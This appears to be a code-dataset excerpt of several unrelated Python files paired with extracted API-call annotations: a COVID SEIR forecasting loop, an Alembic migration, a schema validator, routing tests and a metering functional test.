'removed_tested','removed_nottested','inhabitant']).set_index(['name','date'])
dfs_pred = pd.DataFrame(columns = ['name','date',
'susceptible','exposed','infected_tested',
'infected_nottested',
'removed_tested','removed_nottested']).set_index(['name','date'])
dfs_pred_daily = {}
columns_2 = ['name','date','pred','outcome','diff','rel_diff']
df_return = pd.DataFrame(columns = columns_2)
df_return_2 = pd.DataFrame(columns = columns_2)
df_return_today = pd.DataFrame(columns = columns_2)
for t in range(0, (end_date_number - start_date_number).days + 1):
day_difference = dt.timedelta(days = t)
Current_date_number = start_date_number + day_difference
Current_date = Current_date_number.strftime('%d-%m-%Y')
print('Date:',Current_date)
#Compute right starting date for RIVM simulations
RIVM_date_number = Current_date_number - dt.timedelta(days = Look_into_past)
RIVM_date_str = RIVM_date_number.strftime('%d-%m-%Y')
RIVM_date = rivm.date2mmdd(RIVM_date_number)
init_df = rivm.SEI2R2_init(RIVM_date)
Num_tested = sum(init_df["infected_tested"])
Est_besmettelijk = df_besmettelijk.at[Current_date_number,'prev_avg']
CoronaConstants.fraction_tested = Num_tested / Est_besmettelijk
init_df_02 = rivm.SEI2R2_init(mmdd=RIVM_date, undetected_multiplier=1 / CoronaConstants.fraction_tested)
HELP_df = init_df_02
HELP_df["date"] = RIVM_date_str
HELP_df = HELP_df.reset_index()
HELP_df = HELP_df.set_index(['index','date']).rename(columns = {'index':'name'})
dfs_RIVM = dfs_RIVM.append(HELP_df)
#Set new constants:
CoronaConstants.contacts_average = Avg_contacts
current_row = Trans_rates.loc[RIVM_date_str]
rate_loc = current_row['local_avg7']
rate_mob = current_row['mob_avg7']
frac_pos = current_row['frac_pos']
CoronaConstants.average_total_mobility = current_row['mobility_avg7']
#Compute epsilon, fraction p
Fraction_local_contacts = 1 / (2*CoronaConstants.average_total_mobility / CoronaConstants.population_nl *rate_mob / rate_loc + 1)
transmission_prob = rate_loc / CoronaConstants.contacts_average / Fraction_local_contacts
#transmission_prob = rate_loc / Fraction_local_contacts
#CoronaConstants = CoronaConstants(fraction_local_contacts = Fraction_local_contacts,
# transmission_prob = transmission_prob)
CoronaConstants.fraction_local_contacts = Fraction_local_contacts
CoronaConstants.transmission_prob = transmission_prob
#CoronaConstants = CoronaConstants(**{'transmission_prob':transmission_prob})
seir_model = MobilitySEIR(init_df_02,horizon = horizon + Look_into_past, start_date = Current_date_number.strftime('%d-%m-%Y'),
time_dependency = False,
constants = CoronaConstants(transmission_prob = transmission_prob))
seir_model.simulate_all()
Current_end_date_number = Current_date_number + dt.timedelta(days = horizon)
Current_end_date = Current_end_date_number.strftime('%d-%m-%Y')
HELP_df = seir_model.state_at_horizon()
HELP_df = HELP_df.reset_index()
HELP_df['date'] = Current_end_date
HELP_df = HELP_df.set_index(['name','date'])
#Compute horizon comparison
Pred_state_begin = seir_model.state_at_time(Look_into_past)
Pred_state_end = seir_model.state_at_time(horizon + Look_into_past)
#if r == r_eff_estimate and mob_red == 1-fraction_mobility:
mmdd_end = rivm.date2mmdd(Current_date_number + dt.timedelta(days = horizon) )
mmdd_begin = rivm.date2mmdd(Current_date_number)
df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
df_real = rivm.SEI2R2_init(mmdd_end) - rivm.SEI2R2_init(mmdd_begin)
df_real_It = df_real['infected_tested'] + df_real['removed_tested']
df_diff = abs(df_pred_It - df_real_It)
df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
data = [
[
a,
Current_date,
df_pred_It[a],
df_real_It[a],
df_diff[a],
df_rel_diff[a]
]
for a,x in df_pred_It.items()
]
columns_2 = ['name','date','pred','outcome','diff','rel_diff']
df_new = pd.DataFrame(data=data,columns=columns_2)
df_return = df_return.append(df_new)
#Compute horizon comparison
Pred_state_begin = seir_model.state_at_time(Look_into_past)
Pred_state_end = seir_model.state_at_time(horizon_2 + Look_into_past)
mmdd_end = rivm.date2mmdd(Current_date_number + dt.timedelta(days = horizon_2) )
mmdd_begin = rivm.date2mmdd(Current_date_number)
df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
df_real = rivm.SEI2R2_init(mmdd_end) - rivm.SEI2R2_init(mmdd_begin)
df_real_It = df_real['infected_tested'] + df_real['removed_tested']
df_diff = abs(df_pred_It - df_real_It)
df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
data = [
[
a,
Current_date,
df_pred_It[a],
df_real_It[a],
df_diff[a],
df_rel_diff[a]
]
for a,x in df_pred_It.items()
]
columns_2 = ['name','date','pred','outcome','diff','rel_diff']
df_new_2 = pd.DataFrame(data=data,columns=columns_2)
df_return_2 = df_return_2.append(df_new_2)
#Compute horizon comparison (today)
Pred_state_begin = seir_model.state_at_time(0)
Pred_state_end = seir_model.state_at_time(Look_into_past)
mmdd_end = rivm.date2mmdd(Current_date_number)
mmdd_begin = rivm.date2mmdd(Current_date_number - dt.timedelta(days = Look_into_past))
df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
df_real_It = rivm.rivm_corona(mmdd_end) - rivm.rivm_corona(mmdd_begin)
df_diff = abs(df_pred_It - df_real_It)
df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
data = [
[
a,
Current_date,
df_pred_It[a],
df_real_It[a],
df_diff[a],
df_rel_diff[a]
]
for a,x in df_pred_It.items()
]
columns_2 = ['name','date','pred','outcome','diff','rel_diff']
df_new_today = pd.DataFrame(data=data,columns=columns_2)
df_return_today = df_return_today.append(df_new_today)
dfs_pred = dfs_pred.append(HELP_df)
dfs_pred_daily[Current_end_date] = seir_model.daily_reported_infections()
| [
"rivm_loader.rivm.SEI2R2_init",
"constants.CoronaConstants",
"pandas.read_csv",
"datetime.datetime.strptime",
"os.path.dirname",
"rivm_loader.rivm.rivm_corona",
"rivm_loader.rivm.date2mmdd",
"pandas.DataFrame",
"datetime.timedelta",
"pandas.read_json"
] | [((581, 626), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['start_date', 'date_format'], {}), '(start_date, date_format)\n', (601, 626), True, 'import datetime as dt\n'), ((644, 687), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['end_date', 'date_format'], {}), '(end_date, date_format)\n', (664, 687), True, 'import datetime as dt\n'), ((1897, 1928), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (1909, 1928), True, 'import pandas as pd\n'), ((1945, 1976), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (1957, 1976), True, 'import pandas as pd\n'), ((1997, 2028), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (2009, 2028), True, 'import pandas as pd\n'), ((285, 310), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (300, 310), False, 'import os\n'), ((2120, 2140), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 't'}), '(days=t)\n', (2132, 2140), True, 'import datetime as dt\n'), ((2505, 2537), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['RIVM_date_number'], {}), '(RIVM_date_number)\n', (2519, 2537), False, 'from rivm_loader import rivm\n'), ((2558, 2585), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['RIVM_date'], {}), '(RIVM_date)\n', (2574, 2585), False, 'from rivm_loader import rivm\n'), ((2794, 2890), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', ([], {'mmdd': 'RIVM_date', 'undetected_multiplier': '(1 / CoronaConstants.fraction_tested)'}), '(mmdd=RIVM_date, undetected_multiplier=1 / CoronaConstants.\n fraction_tested)\n', (2810, 2890), False, 'from rivm_loader import rivm\n'), ((5230, 5265), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (5244, 5265), False, 'from rivm_loader import rivm\n'), ((5947, 5989), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), '(data=data, columns=columns_2)\n', (5959, 5989), True, 'import pandas as pd\n'), ((6323, 6358), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (6337, 6358), False, 'from rivm_loader import rivm\n'), ((7041, 7083), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), '(data=data, columns=columns_2)\n', (7053, 7083), True, 'import pandas as pd\n'), ((7337, 7372), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (7351, 7372), False, 'from rivm_loader import rivm\n'), ((8081, 8123), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), '(data=data, columns=columns_2)\n', (8093, 8123), True, 'import pandas as pd\n'), ((364, 380), 'pandas.read_json', 'pd.read_json', (['fn'], {}), '(fn)\n', (376, 380), True, 'import pandas as pd\n'), ((723, 790), 'pandas.read_csv', 'pd.read_csv', (['"""results_forecasting/Trans_rates_NB_mob_final_new.csv"""'], {}), "('results_forecasting/Trans_rates_NB_mob_final_new.csv')\n", (734, 790), True, 'import pandas as pd\n'), ((1227, 1393), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['name', 'date', 'susceptible', 'exposed', 'infected_tested',\n 'infected_nottested', 'removed_tested', 'removed_nottested', 'inhabitant']"}), "(columns=['name', 'date', 'susceptible', 'exposed',\n 'infected_tested', 'infected_nottested', 'removed_tested',\n 'removed_nottested', 'inhabitant'])\n", (1239, 1393), True, 'import pandas as pd\n'), ((1526, 1678), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['name', 'date', 'susceptible', 'exposed', 'infected_tested',\n 'infected_nottested', 'removed_tested', 'removed_nottested']"}), "(columns=['name', 'date', 'susceptible', 'exposed',\n 'infected_tested', 'infected_nottested', 'removed_tested',\n 'removed_nottested'])\n", (1538, 1678), True, 'import pandas as pd\n'), ((2395, 2428), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'Look_into_past'}), '(days=Look_into_past)\n', (2407, 2428), True, 'import datetime as dt\n'), ((4599, 4625), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon'}), '(days=horizon)\n', (4611, 4625), True, 'import datetime as dt\n'), ((5441, 5467), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_end'], {}), '(mmdd_end)\n', (5457, 5467), False, 'from rivm_loader import rivm\n'), ((5470, 5498), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_begin'], {}), '(mmdd_begin)\n', (5486, 5498), False, 'from rivm_loader import rivm\n'), ((6534, 6560), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_end'], {}), '(mmdd_end)\n', (6550, 6560), False, 'from rivm_loader import rivm\n'), ((6563, 6591), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_begin'], {}), '(mmdd_begin)\n', (6579, 6591), False, 'from rivm_loader import rivm\n'), ((7642, 7668), 'rivm_loader.rivm.rivm_corona', 'rivm.rivm_corona', (['mmdd_end'], {}), '(mmdd_end)\n', (7658, 7668), False, 'from rivm_loader import rivm\n'), ((7671, 7699), 'rivm_loader.rivm.rivm_corona', 'rivm.rivm_corona', (['mmdd_begin'], {}), '(mmdd_begin)\n', (7687, 7699), False, 'from rivm_loader import rivm\n'), ((4460, 4512), 'constants.CoronaConstants', 'CoronaConstants', ([], {'transmission_prob': 'transmission_prob'}), '(transmission_prob=transmission_prob)\n', (4475, 4512), False, 'from constants import CoronaConstants\n'), ((5182, 5208), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon'}), '(days=horizon)\n', (5194, 5208), True, 'import datetime as dt\n'), ((6273, 6301), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon_2'}), '(days=horizon_2)\n', (6285, 6301), True, 'import datetime as dt\n'), ((7427, 7460), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'Look_into_past'}), '(days=Look_into_past)\n', (7439, 7460), True, 'import datetime as dt\n')] |
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2019-06-20 16:08:32.621912
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('predictor_category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('value', sa.String(), nullable=False),
sa.Column('predictor_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['predictor_id'], ['predictor.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_predictor_category_predictor_id'), 'predictor_category', ['predictor_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_predictor_category_predictor_id'), table_name='predictor_category')
op.drop_table('predictor_category')
# ### end Alembic commands ###
| [
"sqlalchemy.ForeignKeyConstraint",
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Integer",
"sqlalchemy.String"
] | [((1013, 1048), 'alembic.op.drop_table', 'op.drop_table', (['"""predictor_category"""'], {}), "('predictor_category')\n", (1026, 1048), False, 'from alembic import op\n'), ((573, 632), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['predictor_id']", "['predictor.id']"], {}), "(['predictor_id'], ['predictor.id'])\n", (596, 632), True, 'import sqlalchemy as sa\n'), ((640, 669), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (663, 669), True, 'import sqlalchemy as sa\n'), ((696, 738), 'alembic.op.f', 'op.f', (['"""ix_predictor_category_predictor_id"""'], {}), "('ix_predictor_category_predictor_id')\n", (700, 738), False, 'from alembic import op\n'), ((932, 974), 'alembic.op.f', 'op.f', (['"""ix_predictor_category_predictor_id"""'], {}), "('ix_predictor_category_predictor_id')\n", (936, 974), False, 'from alembic import op\n'), ((424, 436), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (434, 436), True, 'import sqlalchemy as sa\n'), ((478, 489), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (487, 489), True, 'import sqlalchemy as sa\n'), ((538, 550), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (548, 550), True, 'import sqlalchemy as sa\n')] |
import yaml
from util import AttrDict
class SchemaOrField(object):
def __init__(self, optional=False, default=None):
self.optional = optional
self.default = default
def is_optional(self):
return self.optional
def keyify(self, parents, key=None):
if key is not None:
parents = parents + [key]
return ".".join(parents)
class Schema(SchemaOrField):
"""This is a general purpose class to allow enforcing of schemas
from python dicts."""
def __init__(self, schema_dict, **kwargs):
SchemaOrField.__init__(self, **kwargs)
self.schema_dict = schema_dict
def __str__(self):
return str({key: str(val) for (key, val) in self.schema_dict.items()})
def get_missing_required_keys(self, _dict):
required = [key for (key, schema_or_field) in self.schema_dict.iteritems() if not schema_or_field.is_optional]
present_keys = _dict.keys()
return [key for key in required if key not in present_keys]
def get_variable_key(self, key):
if key and key[0] == '_':
return key[1:]
return None
def validate(self, value, parents=[]):
# Schemas are recursively enforced
failed = []
succeeded = {}
if isinstance(value, dict):
_dict = value
variables = [(self.get_variable_key(k), v) for (k, v) in self.schema_dict.items() if self.get_variable_key(k)]
if variables and len(variables) != 1:
err = "schema has mixed variable and fixed settings here {}".format(self.keyify(parents))
return [err], None
if variables: # for variables, we iterate on each (key, value) in received dict
variable_name, schema = variables[0]
if not value.values():
failed.append("{} missing dict for variable \"{}\" and schema {}".format(self.keyify(parents), variable_name, schema))
for (key, subval) in value.iteritems():
_failed, _succeeded = schema.validate(subval, parents + [key])
for fail in _failed:
failed.append(fail)
if _succeeded:
_succeeded[variable_name] = key
succeeded[key] = _succeeded
else: # for non-variables, we enforce the sche
for (key, schema_or_field) in self.schema_dict.iteritems():
subval = _dict.get(key)
if subval is not None: # optional case is checked after
try:
_failed, _succeeded = schema_or_field.validate(subval, parents + [key])
succeeded[key] = _succeeded
for fail in _failed:
failed.append(fail)
except AttributeError:
err_str = "value {} for key {} is not field or schema".format(schema_or_field, self.keyify(parents, key))
return [err_str], None
for missing_key, missing_schema in [(mk, ms) for (mk, ms) in self.schema_dict.items() if mk not in succeeded.keys()]:
if missing_schema.is_optional():
succeeded[missing_key] = missing_schema.default
elif not self.get_variable_key(missing_key): # variable keys handled above
failed.append("required key {} missing".format(self.keyify(parents, missing_key)))
return failed, AttrDict(succeeded)
else:
err_str = "key {} expected to be schema {} but is real value {}".format(self.keyify(parents), self, value)
return [err_str], None
class Field(SchemaOrField):
def __init__(self, field_type, **kwargs):
SchemaOrField.__init__(self, **kwargs)
self.field_type = field_type
def __str__(self):
return str(self.field_type)
def validate(self, value, parents):
validated = value if isinstance(value, self.field_type) else None
if validated is None:
try: # supports validating int strings as ints for example
validated = self.field_type(value)
except ValueError:
pass
except TypeError:
pass
if validated is not None:
return [], validated
return ["{} value({}) doesn't match desired type({})".format(self.keyify(parents), value, self.field_type)], None
class SchemaParser(object):
"""Validates schemas"""
@staticmethod
def from_yaml_file(path, schema):
"""Validates a schema from a yaml file"""
try:
parsed = yaml.load(open(path, 'r'))
return Schema(schema).validate(parsed)
except IOError:
return None, "No such file: {}".format(path)
except yaml.YAMLError as ye:
return None, "YAML file invalid: {}".format(str(ye))
| [
"util.AttrDict"
] | [((2935, 2954), 'util.AttrDict', 'AttrDict', (['succeeded'], {}), '(succeeded)\n', (2943, 2954), False, 'from util import AttrDict\n')] |
# -*- coding: utf-8 -*-
from watson.routing import routers
from pytest import raises
from tests.watson.routing.support import sample_request
class TestDict(object):
def test_create(self):
router = routers.Dict()
assert router
assert repr(router) == '<watson.routing.routers.Dict routes:0>'
def test_instantiate_with_routes(self):
router = routers.Dict({
'home': {
'path': '/'
}
})
assert len(router) == 1
def test_add_child_routes(self):
router = routers.Dict({
'home': {
'path': '/',
'children': {
'about': {
'path': 'about'
}
}
}
})
assert len(router) == 2
def test_add_child_routes_complex(self):
router = routers.Dict({
'1st': {
'path': '/home',
'children': {
'2nd': {
'path': '/:test',
'requires': {'test': '\w+'},
'children': {
'3rd': {
'path': '/:tada'
}
}
}
}
}
})
request = sample_request(PATH_INFO='/home/blah')
assert router.match(request).route.name == '1st/2nd'
request = sample_request(PATH_INFO='/home/blah/tada')
route_match = router.match(request)
assert route_match.route.name == '1st/2nd/3rd'
assert route_match.route.requires['test'] == '\w+'
assert len(router) == 3
def test_match_route(self):
request = sample_request()
router = routers.Dict({
'home': {
'path': '/'
}
})
assert next(router.matches(request))
assert router.match(request)
assert not router.match(sample_request(PATH_INFO='/test'))
def test_match_priority_similar_path(self):
router = routers.Dict({
'page1': {
'path': '/page[/:id[/:blah]]',
},
'page2': {
'path': '/page[/:id[/:blah[/:something]]]',
'priority': 2
}
})
request = sample_request(PATH_INFO='/page')
match = router.match(request)
assert match.route.name == 'page2'
def test_no_match_route(self):
request = sample_request()
router = routers.Dict({
'home': {
'path': '/about'
}
})
with raises(StopIteration):
next(router.matches(request))
def test_assemble(self):
router = routers.Dict({
'home': {
'path': '/'
}
})
assert router.assemble('home') == '/'
with raises(KeyError):
router.assemble('no_route')
class TestList(object):
def test_create(self):
router = routers.List()
assert router
def test_instantiate_with_routes(self):
router = routers.List([
{'name': 'home', 'path': '/'}
])
assert len(router) == 1
def test_invalid_route(self):
with raises(Exception):
routers.List([
{'invalid': 'home', 'path': '/'}
])
def test_multiple_priorities(self):
router = routers.List([
{'name': 'about', 'path': '/about'},
{'name': 'home', 'path': '/'},
])
assert len(router) == 2
assert list(router.routes.items())[0][0] == 'about'
def test_add_child_routes(self):
router = routers.List([
{
'name': 'home',
'path': '/',
'children': [
{'name': 'about', 'path': 'about'}
]
}
])
assert len(router) == 2
class TestChoice(object):
def test_invalid(self):
router = routers.Choice()
with raises(NotImplementedError):
router.add_route('test')
with raises(NotImplementedError):
router.add_definition('test')
def test_create(self):
router = routers.Choice(routers.Dict())
assert router
assert repr(router) == '<watson.routing.routers.Choice routers:1 routes:0>'
router2 = routers.Dict()
router.add_router(router2)
assert repr(router) == '<watson.routing.routers.Choice routers:2 routes:0>'
def test_get_matched_router(self):
router = routers.Choice(routers.Dict())
assert router[routers.Dict]
assert not router['blah']
def test_match_route(self):
request = sample_request(PATH_INFO='/list')
dict_router = routers.Dict({
'dict': {
'path': '/dict',
}
})
list_router = routers.List([
{'name': 'list', 'path': '/list'}
])
router = routers.Choice(dict_router, list_router)
match = router.match(request)
assert match.route.name == 'list'
assert len(router) == 2
assert not router.match(sample_request(PATH_INFO='/test'))
def test_assemble(self):
list_router = routers.List([
{'name': 'list', 'path': '/list'}
])
router = routers.Choice(list_router)
assert router.assemble('list') == '/list'
with raises(KeyError):
router.assemble('invalid')
assert router.assemble('list', query_string={'page': 1}) == '/list?page=1'
assert 'order=desc' in router.assemble('list', query_string={'page': 1, 'order': 'desc'})
| [
"watson.routing.routers.List",
"watson.routing.routers.Dict",
"watson.routing.routers.Choice",
"pytest.raises",
"tests.watson.routing.support.sample_request"
] | [((211, 225), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (223, 225), False, 'from watson.routing import routers\n'), ((382, 419), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (394, 419), False, 'from watson.routing import routers\n'), ((559, 638), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/', 'children': {'about': {'path': 'about'}}}}"], {}), "({'home': {'path': '/', 'children': {'about': {'path': 'about'}}}})\n", (571, 638), False, 'from watson.routing import routers\n'), ((886, 1046), 'watson.routing.routers.Dict', 'routers.Dict', (["{'1st': {'path': '/home', 'children': {'2nd': {'path': '/:test', 'requires':\n {'test': '\\\\w+'}, 'children': {'3rd': {'path': '/:tada'}}}}}}"], {}), "({'1st': {'path': '/home', 'children': {'2nd': {'path':\n '/:test', 'requires': {'test': '\\\\w+'}, 'children': {'3rd': {'path':\n '/:tada'}}}}}})\n", (898, 1046), False, 'from watson.routing import routers\n'), ((1372, 1410), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/home/blah"""'}), "(PATH_INFO='/home/blah')\n", (1386, 1410), False, 'from tests.watson.routing.support import sample_request\n'), ((1490, 1533), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/home/blah/tada"""'}), "(PATH_INFO='/home/blah/tada')\n", (1504, 1533), False, 'from tests.watson.routing.support import sample_request\n'), ((1775, 1791), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {}), '()\n', (1789, 1791), False, 'from tests.watson.routing.support import sample_request\n'), ((1809, 1846), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (1821, 1846), False, 'from watson.routing import routers\n'), ((2114, 2244), 'watson.routing.routers.Dict', 'routers.Dict', (["{'page1': {'path': '/page[/:id[/:blah]]'}, 'page2': {'path':\n '/page[/:id[/:blah[/:something]]]', 'priority': 2}}"], {}), "({'page1': {'path': '/page[/:id[/:blah]]'}, 'page2': {'path':\n '/page[/:id[/:blah[/:something]]]', 'priority': 2}})\n", (2126, 2244), False, 'from watson.routing import routers\n'), ((2370, 2403), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/page"""'}), "(PATH_INFO='/page')\n", (2384, 2403), False, 'from tests.watson.routing.support import sample_request\n'), ((2539, 2555), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {}), '()\n', (2553, 2555), False, 'from tests.watson.routing.support import sample_request\n'), ((2573, 2615), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/about'}}"], {}), "({'home': {'path': '/about'}})\n", (2585, 2615), False, 'from watson.routing import routers\n'), ((2793, 2830), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (2805, 2830), False, 'from watson.routing import routers\n'), ((3070, 3084), 'watson.routing.routers.List', 'routers.List', ([], {}), '()\n', (3082, 3084), False, 'from watson.routing import routers\n'), ((3169, 3214), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'home', 'path': '/'}]"], {}), "([{'name': 'home', 'path': '/'}])\n", (3181, 3214), False, 'from watson.routing import routers\n'), ((3485, 3571), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'about', 'path': '/about'}, {'name': 'home', 'path': '/'}]"], {}), "([{'name': 'about', 'path': '/about'}, {'name': 'home', 'path':\n '/'}])\n", (3497, 3571), False, 'from watson.routing import routers\n'), ((3750, 3849), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'home', 'path': '/', 'children': [{'name': 'about', 'path':\n 'about'}]}]"], {}), "([{'name': 'home', 'path': '/', 'children': [{'name': 'about',\n 'path': 'about'}]}])\n", (3762, 3849), False, 'from watson.routing import routers\n'), ((4074, 4090), 'watson.routing.routers.Choice', 'routers.Choice', ([], {}), '()\n', (4088, 4090), False, 'from watson.routing import routers\n'), ((4454, 4468), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4466, 4468), False, 'from watson.routing import routers\n'), ((4797, 4830), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/list"""'}), "(PATH_INFO='/list')\n", (4811, 4830), False, 'from tests.watson.routing.support import sample_request\n'), ((4853, 4894), 'watson.routing.routers.Dict', 'routers.Dict', (["{'dict': {'path': '/dict'}}"], {}), "({'dict': {'path': '/dict'}})\n", (4865, 4894), False, 'from watson.routing import routers\n'), ((4970, 5019), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'list', 'path': '/list'}]"], {}), "([{'name': 'list', 'path': '/list'}])\n", (4982, 5019), False, 'from watson.routing import routers\n'), ((5059, 5099), 'watson.routing.routers.Choice', 'routers.Choice', (['dict_router', 'list_router'], {}), '(dict_router, list_router)\n', (5073, 5099), False, 'from watson.routing import routers\n'), ((5331, 5380), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'list', 'path': '/list'}]"], {}), "([{'name': 'list', 'path': '/list'}])\n", (5343, 5380), False, 'from watson.routing import routers\n'), ((5420, 5447), 'watson.routing.routers.Choice', 'routers.Choice', (['list_router'], {}), '(list_router)\n', (5434, 5447), False, 'from watson.routing import routers\n'), ((2681, 2702), 'pytest.raises', 'raises', (['StopIteration'], {}), '(StopIteration)\n', (2687, 2702), False, 'from pytest import raises\n'), ((2942, 2958), 'pytest.raises', 'raises', (['KeyError'], {}), '(KeyError)\n', (2948, 2958), False, 'from pytest import raises\n'), ((3317, 3334), 'pytest.raises', 'raises', (['Exception'], {}), '(Exception)\n', (3323, 3334), False, 'from pytest import raises\n'), ((3348, 3396), 'watson.routing.routers.List', 'routers.List', (["[{'invalid': 'home', 'path': '/'}]"], {}), "([{'invalid': 'home', 'path': '/'}])\n", (3360, 3396), False, 'from watson.routing import routers\n'), ((4104, 4131), 'pytest.raises', 'raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (4110, 4131), False, 'from pytest import raises\n'), ((4183, 4210), 'pytest.raises', 'raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (4189, 4210), False, 'from pytest import raises\n'), ((4314, 4328), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4326, 4328), False, 'from watson.routing import routers\n'), ((4660, 4674), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4672, 4674), False, 'from watson.routing import routers\n'), ((5511, 5527), 'pytest.raises', 'raises', (['KeyError'], {}), '(KeyError)\n', (5517, 5527), False, 'from pytest import raises\n'), ((2013, 2046), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/test"""'}), "(PATH_INFO='/test')\n", (2027, 2046), False, 'from tests.watson.routing.support import sample_request\n'), ((5244, 5277), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/test"""'}), "(PATH_INFO='/test')\n", (5258, 5277), False, 'from tests.watson.routing.support import sample_request\n')] |
# Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sentinel.tests.functional import base
from sentinel.tests.functional import client_fixtures as fixtures
COMPUTE_CREATE_START_QUERY = [
{'field': 'event_type', 'op': 'eq', 'value': 'compute.instance.create.start'}
]
class MeteringV2MetersTestCase(base.BaseTestCase):
def test_meters_by_type(self):
grant = self.useFixture(fixtures.UserProjectGrant(self.sentinel))
client = base.FederatedUserClient(grant.user.entity, grant.project.entity)
server = self.useFixture(fixtures.Server(client))
samples = self.sentinel.metering.samples.list(meter_name='vcpus')
resources = [s.resource_id for s in samples]
self.assertIn(server.entity.id, resources)
#events = self.sentinel.metering.events.list(q=COMPUTE_CREATE_START_QUERY)
#instances = [t['value'] for e in events for t in e['traits'] if t['name'] == 'instance_id']
#self.assertIn(server.entity.id, instances)
# vi: ts=4 et:
| [
